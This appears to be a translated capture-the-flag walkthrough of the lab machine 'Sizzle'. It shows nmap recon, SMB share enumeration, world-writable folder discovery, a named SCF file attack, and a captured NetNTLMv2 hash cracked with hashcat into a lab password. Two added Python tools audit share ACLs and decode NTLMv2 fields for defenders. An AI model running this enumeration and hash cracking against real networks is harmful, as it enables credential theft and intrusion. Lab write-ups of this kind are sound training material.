Sizzle - in Arabic

Sizzle walkthrough in Arabic

Recon

nmap

nmap -sV -sC -F -Pn 10.10.10.103

I used -F so the scan runs fast, because I had already tried -p- for all the ports and it took far too long.

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 01:49 EDT
Nmap scan report for 10.10.10.103
Host is up (0.49s latency).
Not shown: 92 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2021-05-19T06:07:04+00:00; +15m54s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2021-05-19T06:07:04+00:00; +15m54s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
445/tcp open microsoft-ds?
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 15m53s, deviation: 0s, median: 15m53s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-05-19T06:06:25
|_ start_date: 2021-05-19T00:11:30
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.26 seconds

sizzle.htb.local appears in the results; add it to

/etc/hosts

FTP

Log in as anonymous, with anonymous / anonymous as username and password.

As you can see, there is nothing here, so I decided to move on to the web server.

Web :80

What the site looks like

Nothing in the source code.

Check the web app, check port 445, check the SSL certificate in case there is something there I missed. I did directory enumeration and found a few interesting things, but nothing very useful.

Here it is a 403 Forbidden. There are a few techniques and tricks we could try, but for now I will not; I will move on, and if nothing works out later I will come back here and try them.

At this path

https://sizzle.htb.local/certsrv

it asks for a username and password. This is just simple authentication, so naturally one could try guessing against it.

So I went to SMB.

SMB

smbclient -L 10.10.10.103
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
CertEnroll Disk Active Directory Certificate Services share
Department Shares Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Operations Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available

The share named CertEnroll is interesting because we saw the same path on the web server above, but we have no permission to do anything with it, so let's go to Department Shares.

smbclient "//10.10.10.103/Department Shares"
smb: \> dir
. D 0 Tue Jul 3 11:22:32 2018
.. D 0 Tue Jul 3 11:22:32 2018
Accounting D 0 Mon Jul 2 15:21:43 2018
Audit D 0 Mon Jul 2 15:14:28 2018
Banking D 0 Tue Jul 3 11:22:39 2018
CEO_protected D 0 Mon Jul 2 15:15:01 2018
Devops D 0 Mon Jul 2 15:19:33 2018
Finance D 0 Mon Jul 2 15:11:57 2018
HR D 0 Mon Jul 2 15:16:11 2018
Infosec D 0 Mon Jul 2 15:14:24 2018
Infrastructure D 0 Mon Jul 2 15:13:59 2018
IT D 0 Mon Jul 2 15:12:04 2018
Legal D 0 Mon Jul 2 15:12:09 2018
M&A D 0 Mon Jul 2 15:15:25 2018
Marketing D 0 Mon Jul 2 15:14:43 2018
R&D D 0 Mon Jul 2 15:11:47 2018
Sales D 0 Mon Jul 2 15:14:37 2018
Security D 0 Mon Jul 2 15:21:47 2018
Tax D 0 Mon Jul 2 15:16:54 2018
Users D 0 Tue Jul 10 17:39:32 2018
ZZ_ARCHIVE D 0 Mon Jul 2 15:32:58 2018
7779839 blocks of size 4096. 3552765 blocks available

Download everything first

smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

Inside Users you will find usernames; you can take those as a user list. I poked around here and there and did not come up with anything, so I sat thinking about something we could check: whether we have write permission on the shares. Honestly I do not remember ever seeing that in a pentest or in bug hunting, but in the end this is a CTF and anything goes, so we will do the following.

First, create a directory

mkdir mount

Second, use the mount command to mount the share onto the directory you just created

sudo mount -t cifs "//10.10.10.103/Department Shares" mount

It will prompt you for a password like this; just press Enter.

Password for [email protected]//10.10.10.103/Department Shares:

Run ls -la

Okay, as you can see, here are our files. According to the permissions highlighted in red, I should be able to write to what is there, since I am root, so let's try writing, for example by creating a file.

As is clear: Permission denied. In short, boss, it is throwing us out (shoving, kicking, booting... pick your favourite synonym). So it occurred to me to write a one-liner: a single-line bash command that goes into every directory and tries to write to it.

Enum write permission first shot

for i in $(ls);do touch $i/test.txt;done
touch: cannot touch 'Accounting/test.txt': Permission denied
touch: cannot touch 'Audit/test.txt': Permission denied
touch: cannot touch 'Banking/test.txt': Permission denied
touch: cannot touch 'CEO_protected/test.txt': Permission denied
touch: cannot touch 'Devops/test.txt': Permission denied
touch: cannot touch 'Finance/test.txt': Permission denied
touch: cannot touch 'HR/test.txt': Permission denied
touch: cannot touch 'Infosec/test.txt': Permission denied
touch: cannot touch 'Infrastructure/test.txt': Permission denied
touch: cannot touch 'IT/test.txt': Permission denied
touch: cannot touch 'Legal/test.txt': Permission denied
touch: cannot touch 'M&A/test.txt': Permission denied
touch: cannot touch 'Marketing/test.txt': Permission denied
touch: cannot touch 'R&D/test.txt': Permission denied
touch: cannot touch 'Sales/test.txt': Permission denied
touch: cannot touch 'Security/test.txt': Permission denied
touch: cannot touch 'Tax/test.txt': Permission denied
touch: cannot touch 'Users/test.txt': Permission denied
touch: cannot touch 'ZZ_ARCHIVE/test.txt': Permission denied

Of course, beautifully, it is all permission denied, but no surrender, no retreat.

Enum write permission second shot

I remembered that with the smbcacls tool I can see the permissions, or more precisely the ACL!

First, let's look at the top-level directories as we did the first time, but this time with smbcacls (the loop is written for bash; the original used echo "\n", which only prints a newline in zsh).

for i in $(ls); do printf '\n%s\n' "$i"; smbcacls -N "//10.10.10.103/Department Shares" "$i"; done

You should get something like this

Accounting
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Audit
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Banking
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
CEO_protected
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Devops
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Finance
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
HR
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Infosec
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Infrastructure
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
IT
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Legal
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
M&A
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Marketing
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
R&D
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Sales
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Security
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Tax
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Users
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/0x0/READ
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
ZZ_ARCHIVE
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

We are looking for the ACL which is

ACL:Everyone:ALLOWED/OI|CI/FULL

This means everyone has full permissions and access. ZZ_ARCHIVE has this ACL, which means we can write there.

Now let's look inside these directories (nested loop; the original was missing the outer do/done):

for i in $(ls); do for x in $(ls "$i"); do printf '\n%s/%s\n' "$i" "$x"; smbcacls -N "//10.10.10.103/Department Shares" "$i/$x"; done; done

You will get a lot of data, but you will find the ACL we want at

/Users/Public

Users/Public
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL

So we have two places we can write to.
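Reading through several hundred lines of smbcacls output by eye is how the author found the two writable paths, but the same check is what a share-permission audit automates: parse the ACEs and flag every path where a broad principal is ALLOWED write, change or full control. The following is an added example in Python, not code from the writeup; it assumes the output format shown above (a path line followed by REVISION/CONTROL/OWNER/GROUP/ACL lines), uses a constructed sample copied from three of the directories above, and deliberately simplifies the Windows access check (it ignores the caller's group memberships and ACE ordering, and only honours a DENIED ACE for the same trustee).

```python
import re
from dataclasses import dataclass

# Constructed sample in the shape smbcacls prints (one path line, then the
# REVISION/CONTROL/OWNER/GROUP/ACL lines). It reuses three directories from
# the writeup output above: Accounting (Everyone gets only inherited READ),
# ZZ_ARCHIVE and Users/Public (an explicit, non-inherited Everyone:FULL ACE).
SAMPLE_OUTPUT = r"""
Accounting
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
ZZ_ARCHIVE
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Users/Public
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
"""

# One ACE as smbcacls prints it: ACL:<trustee>:<ALLOWED|DENIED>/<flags>/<perms>
ACE_RE = re.compile(r"^ACL:(?P<trustee>.+?):(?P<kind>ALLOWED|DENIED)/(?P<flags>[^/]*)/(?P<perms>.+)$")

# Principals that amount to "anyone who can reach the share" (assumed set;
# extend it with your own domain-wide groups if they should count too).
BROAD_PRINCIPALS = {"Everyone", r"NT AUTHORITY\Authenticated Users", r"BUILTIN\Users"}

# When smbcacls prints a raw hex mask instead of FULL/CHANGE/READ, these bits
# mean the trustee can modify content: FILE_WRITE_DATA, FILE_APPEND_DATA,
# GENERIC_WRITE, GENERIC_ALL.
WRITE_MASK = 0x2 | 0x4 | 0x40000000 | 0x10000000


@dataclass
class Ace:
    trustee: str
    kind: str    # ALLOWED or DENIED
    flags: str   # e.g. OI|CI|I; "I" marks an inherited ACE
    perms: str   # FULL, CHANGE, READ, a letter mask such as RW, or a hex mask

    @property
    def inherited(self) -> bool:
        return "I" in self.flags.split("|")

    @property
    def grants_write(self) -> bool:
        if self.perms.startswith("0x"):
            return bool(int(self.perms, 16) & WRITE_MASK)
        return self.perms in ("FULL", "CHANGE") or "W" in self.perms


def parse_smbcacls(text: str) -> dict:
    """Parse concatenated smbcacls output into {path: [Ace, ...]}."""
    acls, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("ACL:"):
            m = ACE_RE.match(line)
            if m is None or current is None:
                raise ValueError(f"unexpected ACL line: {line}")
            acls[current].append(Ace(**m.groupdict()))
        elif line.split(":", 1)[0] in ("REVISION", "CONTROL", "OWNER", "GROUP"):
            continue  # descriptor header lines; not needed for this check
        else:
            current = line  # a path line printed by the enumeration loop
            acls[current] = []
    return acls


def world_writable(acls: dict, broad=BROAD_PRINCIPALS) -> dict:
    """Return {path: [Ace, ...]} for paths where a broad principal is ALLOWED
    write/change/full and no DENIED ACE for the same trustee takes it away.
    Simplified on purpose: the real Windows access check also folds in the
    caller's group memberships and evaluates ACEs in order."""
    findings = {}
    for path, aces in acls.items():
        denied = {a.trustee for a in aces if a.kind == "DENIED" and a.grants_write}
        hits = [a for a in aces
                if a.kind == "ALLOWED" and a.trustee in broad
                and a.grants_write and a.trustee not in denied]
        if hits:
            findings[path] = hits
    return findings


if __name__ == "__main__":
    for path, aces in world_writable(parse_smbcacls(SAMPLE_OUTPUT)).items():
        for a in aces:
            origin = "inherited" if a.inherited else "explicit"
            print(f"{path}: {a.trustee} {a.perms} ({origin})")
```

Feed it the saved output of the two enumeration loops above and it reports ZZ_ARCHIVE and Users/Public, each with an explicit (non-inherited) Everyone:FULL ACE. The inherited flag is the detail worth keeping: an explicit grant to Everyone on a departmental share is a configuration decision someone made, which is exactly what a share-permission review should question.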

Exploit

SCF File Attack

Why all this effort? Because there is a type of attack called the SCF File Attack (click here)

amanda::HTB:9be9fd34c0e927f
hashcat.exe -m 5600 amanda_ntlmhash.txt rockyou.txt -d 1
AMANDA::HTB:9be9fd34c0e927f8:bba79c2b7d92bd323728695003f2d7ca:0101000000000000c0653150de09d201c447124086c661e1000000000200080053004d004200330001001e00570049004e002d00500052004800340039003200520051004100460056000400140053004d00420033002e006c006f00630061006c00030034005700490 04e002d00500052004800340039003200520051004100460056002e0053004d00420033002e006c006f00630061006c000500140053004d00420033002e006c006f00630061006c0007000800c0653150de09d2010600040002000000080030003000000000000000010000000020000047e5928c44fd28913b4318d651f8de351d58bdd648f9ff9c56f18f7743c915b70a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310036002e00310036003000000000000000000000000000:Ashare1972

CREDS: amanda:Ashare1972
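The long hex field in the hashcat -m 5600 line above is not opaque: it is the NTLMv2_CLIENT_CHALLENGE blob from MS-NLMP, and after a fixed header it carries a list of AV_PAIRs that name the server the victim's client thought it was talking to, the NetBIOS and DNS names it advertised, and a timestamp. For an incident responder that is the useful part of a captured NetNTLMv2 line: it dates the exchange and records the target SPN the client requested. The following is an added Python example, not code from the writeup; it parses the USER::DOMAIN:challenge:proof:blob[:password] layout hashcat uses and decodes the AV_PAIRs, and the sample line it builds is constructed (assumed host names, a documentation IP and a placeholder password), not a real capture.

```python
import struct
from datetime import datetime, timedelta, timezone

# AV_PAIR ids from MS-NLMP section 2.2.2.1.
AV_NAMES = {
    0x0000: "MsvAvEOL", 0x0001: "MsvAvNbComputerName", 0x0002: "MsvAvNbDomainName",
    0x0003: "MsvAvDnsComputerName", 0x0004: "MsvAvDnsDomainName", 0x0005: "MsvAvDnsTreeName",
    0x0006: "MsvAvFlags", 0x0007: "MsvAvTimestamp", 0x0008: "MsvAvSingleHost",
    0x0009: "MsvAvTargetName", 0x000A: "MsvAvChannelBindings",
}
UNICODE_AV = {1, 2, 3, 4, 5, 9}          # values stored as UTF-16LE strings
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME counts 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def parse_av_pairs(data: bytes) -> dict:
    """Walk the AV_PAIR list (AvId, AvLen, Value, ...) up to MsvAvEOL."""
    pairs, off = {}, 0
    while True:
        if off + 4 > len(data):
            raise ValueError("AV_PAIR list is not terminated by MsvAvEOL")
        av_id, av_len = struct.unpack_from("<HH", data, off)
        value = data[off + 4:off + 4 + av_len]
        off += 4 + av_len
        if av_id == 0:
            return pairs
        name = AV_NAMES.get(av_id, f"Unknown(0x{av_id:04x})")
        if av_id in UNICODE_AV:
            pairs[name] = value.decode("utf-16-le")
        elif av_id == 7:
            pairs[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        elif av_id == 6:
            pairs[name] = struct.unpack("<I", value)[0]
        else:
            pairs[name] = value.hex()


def parse_netntlmv2(line: str) -> dict:
    """Split a hashcat -m 5600 line (USER::DOMAIN:serverchallenge:ntproofstr:blob[:password])
    and decode the NTLMv2_CLIENT_CHALLENGE blob that follows the NTProofStr."""
    user, sep, rest = line.strip().partition("::")
    fields = rest.split(":")
    if not sep or len(fields) < 4:
        raise ValueError("not a NetNTLMv2 line")
    domain, server_challenge, ntproofstr, blob_hex = fields[:4]
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01":
        raise ValueError("blob does not start with RespType/HiRespType = 1")
    return {
        "user": user,
        "domain": domain,
        "server_challenge": server_challenge,
        "ntproofstr": ntproofstr,
        "timestamp": filetime_to_datetime(struct.unpack_from("<Q", blob, 8)[0]),
        "client_challenge": blob[16:24].hex(),
        "av_pairs": parse_av_pairs(blob[28:]),   # AvPairs follow the 28-byte fixed header
        "cracked_password": fields[4] if len(fields) > 4 else None,
    }


def build_sample_line() -> str:
    """Construct a fake -m 5600 line (assumed values, not a real capture) so the
    parser can be exercised offline."""
    def u(s):
        return s.encode("utf-16-le")
    ts = datetime_to_filetime(datetime(2018, 7, 2, 12, 0, tzinfo=timezone.utc))
    av = [(2, u("SMB3")), (1, u("WIN-EXAMPLE")), (4, u("smb3.local")),
          (3, u("win-example.smb3.local")), (5, u("smb3.local")),
          (7, struct.pack("<Q", ts)), (6, struct.pack("<I", 2)),
          (10, bytes(16)), (9, u("cifs/192.0.2.10"))]
    av_bytes = b"".join(struct.pack("<HH", i, len(v)) + v for i, v in av) + struct.pack("<HH", 0, 0)
    blob = (b"\x01\x01\x00\x00" + bytes(4) + struct.pack("<Q", ts)
            + bytes.fromhex("0001020304050607") + bytes(4) + av_bytes + bytes(4))
    return ("amanda::HTB:1122334455667788:" + bytes(range(16)).hex() + ":"
            + blob.hex() + ":p4ssw0rd-placeholder")


if __name__ == "__main__":
    info = parse_netntlmv2(build_sample_line())
    for key in ("user", "domain", "timestamp", "client_challenge"):
        print(f"{key}: {info[key]}")
    for name, value in info["av_pairs"].items():
        print(f"  {name}: {value}")
```

Paste the hashcat line from this writeup into parse_netntlmv2 and the MsvAvTargetName pair comes back as the cifs/ SPN the client requested, the MsvAvTimestamp pair dates the exchange, and MsvAvFlags equal to 2 records that a MIC was present. Those three fields are what lets a responder tell, from the hash alone, which host the victim account authenticated to and when.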